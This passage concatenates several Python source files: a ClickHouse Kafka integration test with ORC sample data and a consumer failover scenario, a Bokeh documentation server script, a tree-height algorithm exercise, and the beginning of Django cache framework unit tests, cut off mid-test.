b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
logging.debug(f'Set up {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if format_opts.get('printable', False) == False:
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
logging.debug(f'Checking {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name))
errors_expected = format_opts['expected']
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result.strip() == errors_expected.strip(), 'Proper errors for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
def wait_for_new_data(table_name, prev_count = 0, max_retries = 120):
retries = 0
while True:
new_count = int(instance.query("SELECT count() FROM {}".format(table_name)))
print(new_count)
if new_count > prev_count:
return new_count
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception("No new data :(")
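# Failover scenario: three Kafka tables share one consumer group on a two-partition topic, so at most two of
# them can be active at a time. Tables are detached and attached in turn, and after each change the test waits
# until new rows show up in test.destination, i.e. consumption keeps going despite the reassignments.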
def test_kafka_consumer_failover(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "kafka_consumer_failover"
kafka_create_topic(admin_client, topic_name, num_partitions=2)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka3 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.kafka_mv TO test.destination AS
SELECT key, value, 'kafka' as _consumed_by
FROM test.kafka;
CREATE MATERIALIZED VIEW test.kafka2_mv TO test.destination AS
SELECT key, value, 'kafka2' as _consumed_by
FROM test.kafka2;
CREATE MATERIALIZED VIEW test.kafka3_mv TO test.destination AS
SELECT key, value, 'kafka3' as _consumed_by
FROM test.kafka3;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
## all 3 attached, 2 working
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination')
## 2 attached, 2 working
instance.query('DETACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 3 attached, 2 working
instance.query('ATTACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, same 2 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
kafka_delete_topic(admin_client, topic_name)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
docserver.py
|
from __future__ import print_function
import flask
import os
import threading
import time
import webbrowser
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_basedir = os.path.join("..", os.path.dirname(__file__))
app = flask.Flask(__name__, static_path="/unused")
PORT=5009
http_server = HTTPServer(WSGIContainer(app))
@app.route('/')
def welcome():
return """
<h1>Welcome to the Bokeh documentation server</h1>
You probably want to go to <a href="/en/latest/index.html"> Index</a>
"""
@app.route('/en/latest/<path:filename>')
def send_pic(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/"), filename)
@app.route('/scripts/<path:filename>')
def send_script(filename):
return flask.send_from_directory(
os.path.join(_basedir,"sphinx/_build/html/scripts/"), filename)
def open_browser():
    # Runs in a separate thread; give the server a moment to start first.
    time.sleep(0.5)
    webbrowser.open("http://localhost:%d/en/latest/index.html" % PORT, new=2)
data = {}
def serve_http():
    # Keep a reference to the loop that actually runs the server so that
    # shutdown_server() stops the right one.
    data['ioloop'] = IOLoop.instance()
    http_server.listen(PORT)
    data['ioloop'].start()
def shutdown_server():
ioloop = data['ioloop']
ioloop.add_callback(ioloop.stop)
print("Asked Server to shut down.")
def ui():
try:
time.sleep(0.5)
input("Press <ENTER> to exit...\n")
except:
pass
if __name__ == "__main__":
print("\nStarting Bokeh plot server on port %d..." % PORT)
print("Visit http://localhost:%d/en/latest/index.html to see plots\n" % PORT)
t_server = threading.Thread(target=serve_http)
t_server.start()
t_browser = threading.Thread(target=open_browser)
t_browser.start()
ui()
shutdown_server()
t_server.join()
t_browser.join()
print("Server shut down.")
|
tree-height.py
|
# python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
def read(self):
self.n = int(sys.stdin.readline())
self.parent = list(map(int, sys.stdin.readline().split()))
    def compute_height(self):
        maxHeight = 0
        heights = [0] * len(self.parent)
        for vertex in range(self.n):
            if heights[vertex] != 0:
                continue
            # Walk up towards the root (-1), stopping early if we reach an
            # ancestor whose height is already memoized.
            height = 0
            i = vertex
            while i != -1:
                if heights[i] != 0:
                    height += heights[i]
                    break
                height += 1
                i = self.parent[i]
            maxHeight = max(maxHeight, height)
            # Walk the same path again and memoize the height of every vertex
            # on it, so later iterations can stop as soon as they hit it.
            i = vertex
            while i != -1:
                if heights[i] != 0:
                    break
                heights[i] = height
                height -= 1
                i = self.parent[i]
        return maxHeight
# def compute_height(self):
# # Replace this code with a faster implementation
# maxHeight = 0
# for vertex in range(self.n):
# height = 0
# i = vertex
# while i != -1:
# height += 1
# i = self.parent[i]
# maxHeight = max(maxHeight, height);
# return maxHeight;
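# Worked example (illustrative only; the real input arrives on stdin via
# read()): with n = 5 and parent = [4, -1, 4, 1, 1], vertex 1 is the root,
# vertices 3 and 4 are its children, and vertices 0 and 2 hang off vertex 4,
# so the longest root-to-leaf path has three vertices:
#
#   t = TreeHeight()
#   t.n, t.parent = 5, [4, -1, 4, 1, 1]
#   assert t.compute_height() == 3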
def main():
tree = TreeHeight()
tree.read()
print(tree.compute_height())
threading.Thread(target=main).start()
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable(object):
def __getstate__(self):
raise pickle.PickleError()
class UnpicklableType(object):
# Unpicklable using the default pickling protocol on Python 2.
__slots__ = 'a',
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
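# Illustration of the key layout produced above (and, for contrast, the shape
# of Django's stock key function, mentioned only as background):
#
#   custom_key_func('answer', 'prefix', 2)  # -> 'CUSTOM-prefix-2-answer'
#   # the default make_key would yield roughly 'prefix:2:answer'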
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
    # `params` are test specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = {k: base.copy() for k in _caches_setting_base.keys()}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
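# Quick sketch of the merge order described above (hypothetical values, not
# taken from any settings file): test params override the per-alias defaults,
# which in turn override the shared ``base`` backend config.
#
#   caches_setting_for_tests(
#       base={'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
#       LOCATION='unique-snowflake',
#   )['cull']
#   # -> {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
#   #     'OPTIONS': {'MAX_ENTRIES': 30}, 'LOCATION': 'unique-snowflake'}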
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
        # Test for cache key conflicts between caches that share the same backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
